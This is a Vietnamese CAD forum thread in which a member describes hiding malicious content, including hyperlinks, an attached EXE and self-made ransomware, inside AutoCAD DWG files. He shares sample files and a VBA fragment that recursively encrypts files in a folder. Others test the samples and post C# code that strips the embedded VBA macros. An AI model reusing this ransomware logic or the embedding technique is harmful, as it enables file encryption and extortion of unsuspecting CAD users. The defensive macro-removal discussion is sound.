Virus trên file .DWG Cad (Bác nào nhiều kinh nghiệm cho xin ý kiến )

[mmxiv07 3]

Mình đang tìm hiểu về virus và cách diệt virus trên file .DWG của AutoCAD (là loại file thông dụng nhất của AutoCAD phải không nhỉ?), nhưng hiện tại chưa có mẫu virus nào cả. Nếu ACE nào có file dính virus thì vui lòng cho xin để nghiên cứu cách tiêu diệt (chỉ file .DWG, chưa quan tâm tới .LSP, .FAS,...  - mình hoàn toàn không quan tâm tới nội dung bản vẽ đâu vì là dân lập trình & an ninh hệ thống, không biết gì về thiết kế kiến trúc và cũng không có ý định thiết kế gì cả, sẽ xóa ngay bản vẽ sau khi lấy được mẫu virus). Xin cảm ơn!

PS: file nhiễm virus vui lòng gửi email tới địa chỉ thaihungvan@gmail.com, nếu ACE nào có tài liệu về tổ chức bên trong (file format structure) của file .DWG version 2018 thì share cho luôn!

[Danh Cong 422]

@@, Nghe chừng file .DWG không có chứa virus đâu ^^. Chỉ có virut đính kèm trong thư mục bản vẽ thôi . Thường là định dạng .fas hoặc acaddoc.lsp là những loại phổ thông nhất. 

Bạn thích thì thử tìm hiểu luôn :v

acaddoc.lsp

Virut.rar

[mmxiv07 3]

52 phút trước, Danh Cong đã nói:

@@, Nghe chừng file .DWG không có chứa virus đâu ^^. Chỉ có virut đính kèm trong thư mục bản vẽ thôi . Thường là định dạng .fas hoặc acaddoc.lsp là những loại phổ thông nhất. 

Bạn thích thì thử tìm hiểu luôn :v

acaddoc.lsp

Virut.rar

Virus ứng với định dạng LSP, FAS thì có vẻ quá dễ phát hiện & tiêu diệt - nhiều hệ thống đã hỗ trợ. Mình muốn làm cái mà hầu như chưa ai làm!

Trước mắt là có thể nhúng hyperlink vào DWG (ngoài link chính thống còn có thể kết buộc với 1 đối tượng gì đó như là 1 đoạn thẳng chẳng hạn), mà hyperlink thì có thể thực thi 1 chương trình /trang web độc hại - mình vừa test thử:). Mình cũng vừa ghép 1 file .EXE chứa virus vào DWG mà AutoCAD version 2018 cũng vẫn mở lên ngon lành không thông báo gì cả!

 

(khái niệm virus mà mình là đang dùng ở đây là các nội dung độc hại nói chung - có thể không tự active, những thứ do "người xấu" đưa vào chứ không phải các nội dung lành mạnh mà người dùng bình thường và AutoCAD tạo ra:)

 

Các mã lệnh LISP có thể đưa vào trong file DWG không nhỉ?

[mmxiv07 3]

Vào lúc 12/14/2017 tại 11:41, Danh Cong đã nói:

@@, Nghe chừng file .DWG không có chứa virus đâu ^^. Chỉ có virut đính kèm trong thư mục bản vẽ thôi . Thường là định dạng .fas hoặc acaddoc.lsp là những loại phổ thông nhất. 

Bạn thích thì thử tìm hiểu luôn :v

acaddoc.lsp

Virut.rar

ko có mẫu virus mình đã tự tạo. CAD mặc định lưu macro thành các file riêng (lsp, fas, dvb,...) nhưng cũng có cho set lại để nhúng trực tiếp macro vào file DWG, bên trong file DWG cũng có nhiều chỗ để nhúng các malicious content (phải tự phân tích cấu trúc và xử lý ở cấp binary - cấp hacker biết lập trình với binary:).

 

AutoDesk ko muốn hacker đụng chạm đến DWG nên mã hóa rất ác liệt và ko public tài liệu mô tả, mỗi thành phần trong file mã theo 1 kiểu - rồi cứ sau vài năm lại đổi file format structure! Hiện tại mình đã decode được các version từ 2004 đến 2018, ngoại trừ 2007 :)

[Danh Cong 422]

2 giờ trước, mmxiv07 đã nói:

ko có mẫu virus mình đã tự tạo. CAD mặc định lưu macro thành các file riêng (lsp, fas, dvb,...) nhưng cũng có cho set lại để nhúng trực tiếp macro vào file DWG, bên trong file DWG cũng có nhiều chỗ để nhúng các malicious content (phải tự phân tích cấu trúc và xử lý ở cấp binary - cấp hacker biết lập trình với binary:).

 

AutoDesk ko muốn hacker đụng chạm đến DWG nên mã hóa rất ác liệt và ko public tài liệu mô tả, mỗi thành phần trong file mã theo 1 kiểu - rồi cứ sau vài năm lại đổi file format structure! Hiện tại mình đã decode được các version từ 2004 đến 2018, ngoại trừ 2007 :)

 

#mmxiv07,

Mình ko tìm hiểu sâu trong cấu trúc dữ liệu Autocad, nên ko giúp gì cho bạn được.

Bạn có thể liên hệ với các thành viên kỳ cựu trong lĩnh vực này ( Theo như mình biết, các bác này có kiến thức rất sâu trong mảng lập trình ). https://www.cadviet.com/forum/topmembers/

Như bác NguyenHoanh, Tue NV,  PhamThanhBinh, Doan Van Ha, KetXu, GiaBach, DuongTrungHuy và nhiều thành viên khác ...., các bác ấy khá nhiệt tình, bạn thử liên hệ xem. :)))

[mmxiv07 3]

Vào lúc 1/2/2018 tại 11:22, Danh Cong đã nói:

 

#mmxiv07,

Mình ko tìm hiểu sâu trong cấu trúc dữ liệu Autocad, nên ko giúp gì cho bạn được.

Bạn có thể liên hệ với các thành viên kỳ cựu trong lĩnh vực này ( Theo như mình biết, các bác này có kiến thức rất sâu trong mảng lập trình ). https://www.cadviet.com/forum/topmembers/

Như bác NguyenHoanh, Tue NV,  PhamThanhBinh, Doan Van Ha, KetXu, GiaBach, DuongTrungHuy và nhiều thành viên khác ...., các bác ấy khá nhiệt tình, bạn thử liên hệ xem. :)))

 

Okay. cảm ơn nhé! Tôi sẽ xin các vị đó chỉ giáo. Tôi đã tự làm 1 số virus, ransomware (có hạn chế tác hại và có thiết kế cho phép khôi phục dữ liệu) nằm ngay bên trong DWG chứ không phải để rời thành các file FAS, LSP, VLX, DCL, DVB,.. khiến cho dễ bị phát hiện - Ai có muốn thử nghiệm /tìm hiểu thì tôi tặng cho!

[ketxu 2985]

Ketxu cũng không biết món này mô ^^. Bạn post thử 1 em lên cho ae chọc ngoáy xem sao ^^
Nếu là "virus", bạn có thể mô tả sơ qua về cơ chế lây lan của nó ?
Nếu tự active được thì cũng sẽ là 1 hướng để khóa bản vẽ. 
(Ps : Để tránh đau lòng và anh em hào hứng vọc vạch thì đó chỉ nên là 1 đoạn cảnh báo )

[mmxiv07 3]

Vào lúc 3/6/2018 tại 17:34, ketxu đã nói:

Ketxu cũng không biết món này mô ^^. Bạn post thử 1 em lên cho ae chọc ngoáy xem sao ^^
Nếu là "virus", bạn có thể mô tả sơ qua về cơ chế lây lan của nó ?
Nếu tự active được thì cũng sẽ là 1 hướng để khóa bản vẽ. 
(Ps : Để tránh đau lòng và anh em hào hứng vọc vạch thì đó chỉ nên là 1 đoạn cảnh báo )

 

con ransomware trong file DWG này thay vì mã hóa tất cả dữ liệu trên máy thì tôi chỉ mã các file trong folder C:\Test\Ransomware (và các subfolder trong đó - lưu ý: nếu không thấy folder đó thì nó thay bằng folder hiện hành) 

Khi đóng file DWG thì sẽ có thông báo yêu cầu nhập key giải mã (không phải chuyển tiền chuộc dữ liệu:). Key giải mã là "**C***H*", với C là ký tự và  H là số ứng với giờ hiện tại, * là ký tự bất kỳ

R2004.ransomware.pw.dwg

[gia_bach 1553]

Open - saveAs to new file :  chưa thấy gì ???

- không yêu cầu nhập key !

 

Không biết bao giờ mới gửi thông báo chuyển tiền chuộc ?

[mmxiv07 3]

3 giờ trước, gia_bach đã nói:

Open - saveAs to new file :  chưa thấy gì ???

- không yêu cầu nhập key !

 

Không biết bao giờ mới gửi thông báo chuyển tiền chuộc ?

 

Để ko gây ảnh hưởng, điều kiện mã hóa khá nghiêm ngặt - chỉ mã các file được qui định trong folder "c:\Test\Ransomware" thôi, và cũng giới hạn hoạt động khi có tồn tại file "done.rw" hoặc "set.rw" tùy theo nội dung bên trong của 2 file này :)

 

    Set FileSystemObject = CreateObject("Scripting.FileSystemObject")
    Set Folder = FileSystemObject.GetFolder(FolderName)
    If (Right(FolderName, 1) <> "\") Then FolderName = FolderName & "\"
    For Each File In Folder.Files
        If (Right(File.Name, Len(EXT_)) = EXT_) Then
            EncryptFile (FolderName & File.Name)
        End If
    Next File
    'Call EncryptFolder(Folder.Name, WildcardStr)
    If IsSubfolders Then
        For Each SubFolder In Folder.SubFolders
            Call EncryptAll(SubFolder.Path, True)
        Next SubFolder

 

File DWG này cũng chỉ quan tâm tới folder đó nhưng có mở rộng ra các loại file sẽ mã

R2007.ransomware.pw.dwg

[gia_bach 1553]

Gửi mọi người file DXF của "R2007.ransomware.pw.dwg" để tiện "vọc vạch"

 

R2007.ransomware.pw.dxf

Chỉnh sửa Tháng 3 14, 2018 theo gia_bach

[Detailing 281]

trigger virus bằng VBA? chắc gia_bach xài CAD đời cao nên nó ko chạy VBA được.

[gia_bach 1553]

Không phải do Cad đời cao hay thấp, mà là VBA có enable hay không ?

 

DBDictionary nod = (DBDictionary)db.NamedObjectsDictionaryId.GetObject(OpenMode.ForRead);
DBDictionary dict = (DBDictionary)tr.GetObject(nod.GetAt("ACAD_VBA"), OpenMode.ForWrite);
dict.Erase();

[Detailing 281]

Ý mình là nếu muốn test con virus thì phải cho nó chạy (enable macro).

Viết virus embed vô dwg để AutoCAD "run dùm" thì chắc impossible rồi, viết Exploit attach vô dwg để khi double click vo file thì active dc thì may ra nhưng chắc Antivirus sẽ bắt được.

Have fun!